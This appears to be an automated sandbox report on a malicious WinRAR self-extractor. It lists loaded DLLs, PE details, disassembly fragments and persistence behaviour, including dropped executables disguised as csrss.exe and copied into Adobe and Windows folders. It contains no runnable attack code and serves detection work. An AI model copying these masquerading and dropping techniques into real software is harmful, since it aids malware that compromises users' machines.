                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                          Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dll
                          Source: C:\Windows\System32\cmd.exeSection loaded: apphelp.dll
                          Source: C:\Windows\System32\chcp.comSection loaded: ulib.dll
                          Source: C:\Windows\System32\chcp.comSection loaded: fsutilext.dll
                          Source: C:\Windows\System32\PING.EXESection loaded: iphlpapi.dll
                          Source: C:\Windows\System32\PING.EXESection loaded: mswsock.dll
                          Source: C:\Windows\System32\PING.EXESection loaded: dnsapi.dll
                          Source: C:\Windows\System32\PING.EXESection loaded: rasadhlp.dll
                          Source: C:\Windows\System32\PING.EXESection loaded: fwpuclnt.dll
                          Source: C:\Windows\System32\PING.EXESection loaded: winnsi.dll
                          Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: fastprox.dll
                          Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: ncobjapi.dll
                          Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dll
                          Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dll
                          Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: kernel.appcore.dll
                          Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mpclient.dll
                          Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dll
                          Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: version.dll
                          Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: msasn1.dll
                          Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wmitomi.dll
                          Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mi.dll
                          Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dll
                          Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dll
                          Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: gpapi.dll
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeSection loaded: mscoree.dll
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeSection loaded: apphelp.dll
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeSection loaded: kernel.appcore.dll
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeSection loaded: version.dll
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeSection loaded: vcruntime140_clr0400.dll
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeSection loaded: ucrtbase_clr0400.dll
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeSection loaded: ucrtbase_clr0400.dll
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeSection loaded: windows.storage.dll
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeSection loaded: wldp.dll
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeSection loaded: profapi.dll
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeSection loaded: cryptsp.dll
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeSection loaded: rsaenh.dll
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeSection loaded: cryptbase.dll
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeSection loaded: sspicli.dll
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeSection loaded: ktmw32.dll
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeSection loaded: amsi.dll
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeSection loaded: userenv.dll
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeSection loaded: wbemcomn.dll
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeSection loaded: iphlpapi.dll
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeSection loaded: dnsapi.dll
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeSection loaded: dhcpcsvc6.dll
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeSection loaded: dhcpcsvc.dll
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeSection loaded: winnsi.dll
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeSection loaded: rasapi32.dll
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeSection loaded: rasman.dll
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeSection loaded: rtutils.dll
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeSection loaded: mswsock.dll
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeSection loaded: winhttp.dll
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeSection loaded: ondemandconnroutehelper.dll
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeSection loaded: uxtheme.dll
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeSection loaded: winmm.dll
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeSection loaded: winmmbase.dll
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeSection loaded: mmdevapi.dll
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeSection loaded: devobj.dll
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeSection loaded: ksuser.dll
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeSection loaded: avrt.dll
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeSection loaded: audioses.dll
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeSection loaded: powrprof.dll
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeSection loaded: umpdc.dll
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeSection loaded: msacm32.dll
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeSection loaded: midimap.dll
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeSection loaded: edputil.dll
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeSection loaded: dwrite.dll
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeSection loaded: windowscodecs.dll
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeSection loaded: ntmarta.dll
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeSection loaded: dpapi.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: qmgr.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: bitsperf.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: xmllite.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: firewallapi.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: esent.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: umpdc.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: dnsapi.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: iphlpapi.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: fwbase.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: ntmarta.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: flightsettings.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: netprofm.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: npmproxy.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: bitsigd.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: upnp.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: ssdpapi.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: urlmon.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: iertutil.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: srvcli.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: appxdeploymentclient.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: cryptbase.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: wsmauto.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: miutils.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: wsmsvc.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: dsrole.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: pcwum.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: mi.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: gpapi.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: wkscli.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: msv1_0.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: ntlmshared.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: cryptdll.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: webio.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: mswsock.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: winnsi.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: fwpuclnt.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: rasadhlp.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: rmclient.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: usermgrcli.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: execmodelclient.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: propsys.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: coremessaging.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: twinapi.appcore.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: onecorecommonproxystub.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: execmodelproxy.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: resourcepolicyclient.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: vssapi.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: vsstrace.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: samcli.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: samlib.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: es.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: bitsproxy.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc6.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: schannel.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: mskeyprotect.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: ntasn1.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: ncrypt.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: ncryptsslp.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: msasn1.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: cryptsp.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: rsaenh.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: dpapi.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: mpr.dll
                          Source: C:\Users\user\Desktop\updIMdPUj8.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00BB2765-6A77-11D0-A535-00C04FD7D062}\InProcServer32Jump to behavior
                          Source: Window RecorderWindow detected: More than 3 window changes detected
                          Source: C:\BridgeSavesMonitor\hypersurrogateComponentdhcp.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
                          Source: C:\BridgeSavesMonitor\hypersurrogateComponentdhcp.exeDirectory created: C:\Program Files\Windows Multimedia Platform\ZWgKQlTqcrSB.exeJump to behavior
                          Source: C:\BridgeSavesMonitor\hypersurrogateComponentdhcp.exeDirectory created: C:\Program Files\Windows Multimedia Platform\b2c372d662fd88Jump to behavior
                          Source: C:\BridgeSavesMonitor\hypersurrogateComponentdhcp.exeDirectory created: C:\Program Files\Adobe\ZWgKQlTqcrSB.exeJump to behavior
                          Source: C:\BridgeSavesMonitor\hypersurrogateComponentdhcp.exeDirectory created: C:\Program Files\Adobe\b2c372d662fd88Jump to behavior
                          Source: updIMdPUj8.exeStatic file information: File size 2937141 > 1048576
                          Source: updIMdPUj8.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                          Source: updIMdPUj8.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                          Source: updIMdPUj8.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                          Source: updIMdPUj8.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                          Source: updIMdPUj8.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                          Source: updIMdPUj8.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                          Source: updIMdPUj8.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                          Source: updIMdPUj8.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                          Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: updIMdPUj8.exe
                          Source: updIMdPUj8.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                          Source: updIMdPUj8.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                          Source: updIMdPUj8.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                          Source: updIMdPUj8.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                          Source: updIMdPUj8.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
                          Source: C:\Users\user\Desktop\updIMdPUj8.exeFile created: C:\BridgeSavesMonitor\__tmp_rar_sfx_access_check_6801140Jump to behavior
                          Source: updIMdPUj8.exeStatic PE information: section name: .didat
                          Source: C:\Users\user\Desktop\updIMdPUj8.exeCode function: 0_2_00B3F640 push ecx; ret 0_2_00B3F653
                          Source: C:\Users\user\Desktop\updIMdPUj8.exeCode function: 0_2_00B3EB78 push eax; ret 0_2_00B3EB96
                          Source: C:\BridgeSavesMonitor\hypersurrogateComponentdhcp.exeCode function: 5_2_00007FFD9B9E3CB9 push ebx; retf 5_2_00007FFD9B9E3CBA
                          Source: C:\BridgeSavesMonitor\hypersurrogateComponentdhcp.exeCode function: 5_2_00007FFD9BBBAC5C push edi; retf 5_2_00007FFD9BBBAC7A
                          Source: C:\BridgeSavesMonitor\hypersurrogateComponentdhcp.exeCode function: 5_2_00007FFD9BBBABF2 push ecx; retf 5_2_00007FFD9BBBABFA
                          Source: C:\BridgeSavesMonitor\hypersurrogateComponentdhcp.exeCode function: 5_2_00007FFD9BBBAC1C push esp; retf 5_2_00007FFD9BBBAC3A
                          Source: C:\BridgeSavesMonitor\hypersurrogateComponentdhcp.exeCode function: 5_2_00007FFD9BBBA6D3 push ss; retf 5_2_00007FFD9BBBA70A
                          Source: C:\BridgeSavesMonitor\hypersurrogateComponentdhcp.exeCode function: 5_2_00007FFD9BBBA5CC push es; retf 5_2_00007FFD9BBBA5CA
                          Source: C:\BridgeSavesMonitor\hypersurrogateComponentdhcp.exeCode function: 5_2_00007FFD9BBBA50D push es; retf 5_2_00007FFD9BBBA5CA
                          Source: C:\BridgeSavesMonitor\hypersurrogateComponentdhcp.exeCode function: 5_2_00007FFD9BF7C5C9 push ebx; iretd 5_2_00007FFD9BF7C5CA
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_00007FFD9B8FD2A5 pushad ; iretd 7_2_00007FFD9B8FD2A6
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_00007FFD9BA1953C push ebx; ret 7_2_00007FFD9BA1954A
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_00007FFD9BAE2316 push 8B485F92h; iretd 7_2_00007FFD9BAE231B
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00007FFD9B8ED2A5 pushad ; iretd 8_2_00007FFD9B8ED2A6
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00007FFD9BA03EEE pushad ; iretd 8_2_00007FFD9BA03F9B
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00007FFD9BAD2316 push 8B485F93h; iretd 8_2_00007FFD9BAD231B
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_00007FFD9B8FD2A5 pushad ; iretd 10_2_00007FFD9B8FD2A6
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_00007FFD9BA12315 pushad ; iretd 10_2_00007FFD9BA1232D
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_00007FFD9BAE5FD8 pushad ; iretd 10_2_00007FFD9BAE5FD9
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_00007FFD9BAE2316 push 8B485F92h; iretd 10_2_00007FFD9BAE231B
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 11_2_00007FFD9B8ED2A5 pushad ; iretd 11_2_00007FFD9B8ED2A6
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 11_2_00007FFD9BA03EFE pushad ; iretd 11_2_00007FFD9BA03F8B
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 11_2_00007FFD9BAD2316 push 8B485F93h; iretd 11_2_00007FFD9BAD231B
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_00007FFD9B90D2A5 pushad ; iretd 13_2_00007FFD9B90D2A6
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_00007FFD9BAF2316 push 8B485F91h; iretd 13_2_00007FFD9BAF231B
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeCode function: 24_2_00007FFD9BBC9E10 pushad ; ret 24_2_00007FFD9BBC9E11
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeCode function: 24_2_00007FFD9BF8D0E0 push FFFFFFE8h; retf 24_2_00007FFD9BF8D0F1
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeCode function: 24_2_00007FFD9C1051EB push esp; iretd 24_2_00007FFD9C1051EC
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeCode function: 24_2_00007FFD9C105230 push esp; iretd 24_2_00007FFD9C105231

                          Persistence and Installation Behavior

                          barindex
                          Drops PE files with benign system names
                          Source: C:\BridgeSavesMonitor\hypersurrogateComponentdhcp.exeFile created: C:\Recovery\csrss.exeJump to dropped file
                          Drops executable to a common third party application directory
                          Source: C:\BridgeSavesMonitor\hypersurrogateComponentdhcp.exeFile written: C:\Program Files\Adobe\ZWgKQlTqcrSB.exeJump to behavior
                          Drops executables to the windows directory (C:\Windows) and starts them
                          Source: C:\Windows\System32\cmd.exeExecutable created and started: C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                          Source: C:\BridgeSavesMonitor\hypersurrogateComponentdhcp.exeFile created: C:\Users\user\Desktop\eRokfvkG.logJump to dropped file
                          Source: C:\BridgeSavesMonitor\hypersurrogateComponentdhcp.exeFile created: C:\Users\user\Desktop\cXlUovHQ.logJump to dropped file
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeFile created: C:\Users\user\Desktop\fEwcKMUX.logJump to dropped file
                          Source: C:\BridgeSavesMonitor\hypersurrogateComponentdhcp.exeFile created: C:\Users\user\Desktop\NKXFMJFr.logJump to dropped file
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeFile created: C:\Users\user\Desktop\XpVNKoNn.logJump to dropped file
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeFile created: C:\Users\user\Desktop\MJbpFLtL.logJump to dropped file
                          Source: C:\BridgeSavesMonitor\hypersurrogateComponentdhcp.exeFile created: C:\Program Files\Windows Multimedia Platform\ZWgKQlTqcrSB.exeJump to dropped file
                          Source: C:\BridgeSavesMonitor\hypersurrogateComponentdhcp.exeFile created: C:\Users\user\Desktop\TuQMKFja.logJump to dropped file
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeFile created: C:\Users\user\Desktop\EOLhHxkb.logJump to dropped file
                          Source: C:\BridgeSavesMonitor\hypersurrogateComponentdhcp.exeFile created: C:\Users\user\Desktop\KCawqqLw.logJump to dropped file
                          Source: C:\BridgeSavesMonitor\hypersurrogateComponentdhcp.exeFile created: C:\Users\user\Desktop\DWtPcxKJ.logJump to dropped file
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeFile created: C:\Users\user\Desktop\yeGIODyj.logJump to dropped file
                          Source: C:\BridgeSavesMonitor\hypersurrogateComponentdhcp.exeFile created: C:\Users\user\Desktop\cPBBKMgL.logJump to dropped file
                          Source: C:\BridgeSavesMonitor\hypersurrogateComponentdhcp.exeFile created: C:\Users\user\Desktop\zomqzklW.logJump to dropped file
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeFile created: C:\Users\user\Desktop\XXPuwSTl.logJump to dropped file
                          Source: C:\BridgeSavesMonitor\hypersurrogateComponentdhcp.exeFile created: C:\Users\user\Desktop\kSAcnKQA.logJump to dropped file
                          Source: C:\BridgeSavesMonitor\hypersurrogateComponentdhcp.exeFile created: C:\Users\user\Desktop\GUTYNdlI.logJump to dropped file
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeFile created: C:\Users\user\Desktop\yViIeRfn.logJump to dropped file
                          Source: C:\BridgeSavesMonitor\hypersurrogateComponentdhcp.exeFile created: C:\Users\user\Desktop\zgCYVAKQ.logJump to dropped file
                          Source: C:\BridgeSavesMonitor\hypersurrogateComponentdhcp.exeFile created: C:\Program Files (x86)\Windows NT\Accessories\ZWgKQlTqcrSB.exeJump to dropped file
                          Source: C:\BridgeSavesMonitor\hypersurrogateComponentdhcp.exeFile created: C:\Program Files\Adobe\ZWgKQlTqcrSB.exeJump to dropped file
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeFile created: C:\Users\user\Desktop\nzLkJbeH.logJump to dropped file
                          Source: C:\BridgeSavesMonitor\hypersurrogateComponentdhcp.exeFile created: C:\Users\user\Desktop\hbKlfOQH.logJump to dropped file
                          Source: C:\BridgeSavesMonitor\hypersurrogateComponentdhcp.exeFile created: C:\Users\user\Desktop\QvCVTWQk.logJump to dropped file
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeFile created: C:\Users\user\Desktop\IECYOtkU.logJump to dropped file
                          Source: C:\BridgeSavesMonitor\hypersurrogateComponentdhcp.exeFile created: C:\Users\user\Desktop\YqSdRlZU.logJump to dropped file
                          Source: C:\BridgeSavesMonitor\hypersurrogateComponentdhcp.exeFile created: C:\Users\user\Desktop\oROSeukq.logJump to dropped file
                          Source: C:\BridgeSavesMonitor\hypersurrogateComponentdhcp.exeFile created: C:\Users\user\Desktop\PHyNhJUm.logJump to dropped file
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeFile created: C:\Users\user\Desktop\OxfxrZpJ.logJump to dropped file
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeFile created: C:\Users\user\Desktop\AQlYVRJc.logJump to dropped file
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeFile created: C:\Users\user\Desktop\krNbnIjL.logJump to dropped file
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeFile created: C:\Users\user\Desktop\TkxwTWEx.logJump to dropped file
                          Source: C:\BridgeSavesMonitor\hypersurrogateComponentdhcp.exeFile created: C:\Users\user\Desktop\aeWlDzVS.logJump to dropped file
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeFile created: C:\Users\user\Desktop\tahrXlpt.logJump to dropped file
                          Source: C:\BridgeSavesMonitor\hypersurrogateComponentdhcp.exeFile created: C:\Recovery\csrss.exeJump to dropped file
                          Source: C:\BridgeSavesMonitor\hypersurrogateComponentdhcp.exeFile created: C:\Windows\TAPI\ZWgKQlTqcrSB.exeJump to dropped file
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeFile created: C:\Users\user\Desktop\gBXkgMjS.logJump to dropped file
                          Source: C:\BridgeSavesMonitor\hypersurrogateComponentdhcp.exeFile created: C:\Users\user\Desktop\ddkcuipI.logJump to dropped file
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeFile created: C:\Users\user\Desktop\gSeCuhdU.logJump to dropped file
                          Source: C:\BridgeSavesMonitor\hypersurrogateComponentdhcp.exeFile created: C:\Users\user\Desktop\KUhOFMFy.logJump to dropped file
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeFile created: C:\Users\user\Desktop\kOfTBNTO.logJump to dropped file
                          Source: C:\Users\user\Desktop\updIMdPUj8.exeFile created: C:\BridgeSavesMonitor\hypersurrogateComponentdhcp.exeJump to dropped file
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeFile created: C:\Users\user\Desktop\IwSFjKJP.logJump to dropped file
                          Source: C:\BridgeSavesMonitor\hypersurrogateComponentdhcp.exeFile created: C:\Users\user\Desktop\HRugjdAD.logJump to dropped file
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeFile created: C:\Users\user\Desktop\MBrWacSF.logJump to dropped file
                          Source: C:\BridgeSavesMonitor\hypersurrogateComponentdhcp.exeFile created: C:\Users\user\Desktop\PybNxWBp.logJump to dropped file
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeFile created: C:\Users\user\Desktop\dBJtpdQc.logJump to dropped file
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeFile created: C:\Users\user\Desktop\RfmVTnPw.logJump to dropped file
                          Source: C:\BridgeSavesMonitor\hypersurrogateComponentdhcp.exeFile created: C:\Users\user\Desktop\ATGgGOGO.logJump to dropped file
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeFile created: C:\Users\user\Desktop\GQyPcgoW.logJump to dropped file
                          Source: C:\BridgeSavesMonitor\hypersurrogateComponentdhcp.exeFile created: C:\Users\user\Desktop\kJRJIbpu.logJump to dropped file
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeFile created: C:\Users\user\Desktop\EXjhrjDY.logJump to dropped file
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeFile created: C:\Users\user\Desktop\HNZYygDR.logJump to dropped file
                          Source: C:\BridgeSavesMonitor\hypersurrogateComponentdhcp.exeFile created: C:\Users\user\Desktop\xAiiOWpY.logJump to dropped file
                          Source: C:\BridgeSavesMonitor\hypersurrogateComponentdhcp.exeFile created: C:\Windows\TAPI\ZWgKQlTqcrSB.exeJump to dropped file
                          Source: C:\BridgeSavesMonitor\hypersurrogateComponentdhcp.exeFile created: C:\Users\user\Desktop\cXlUovHQ.logJump to dropped file
                          Source: C:\BridgeSavesMonitor\hypersurrogateComponentdhcp.exeFile created: C:\Users\user\Desktop\PybNxWBp.logJump to dropped file
                          Source: C:\BridgeSavesMonitor\hypersurrogateComponentdhcp.exeFile created: C:\Users\user\Desktop\GUTYNdlI.logJump to dropped file
                          Source: C:\BridgeSavesMonitor\hypersurrogateComponentdhcp.exeFile created: C:\Users\user\Desktop\cPBBKMgL.logJump to dropped file
                          Source: C:\BridgeSavesMonitor\hypersurrogateComponentdhcp.exeFile created: C:\Users\user\Desktop\KCawqqLw.logJump to dropped file
                          Source: C:\BridgeSavesMonitor\hypersurrogateComponentdhcp.exeFile created: C:\Users\user\Desktop\ATGgGOGO.logJump to dropped file
                          Source: C:\BridgeSavesMonitor\hypersurrogateComponentdhcp.exeFile created: C:\Users\user\Desktop\kSAcnKQA.logJump to dropped file
                          Source: C:\BridgeSavesMonitor\hypersurrogateComponentdhcp.exeFile created: C:\Users\user\Desktop\aeWlDzVS.logJump to dropped file
                          Source: C:\BridgeSavesMonitor\hypersurrogateComponentdhcp.exeFile created: C:\Users\user\Desktop\QvCVTWQk.logJump to dropped file
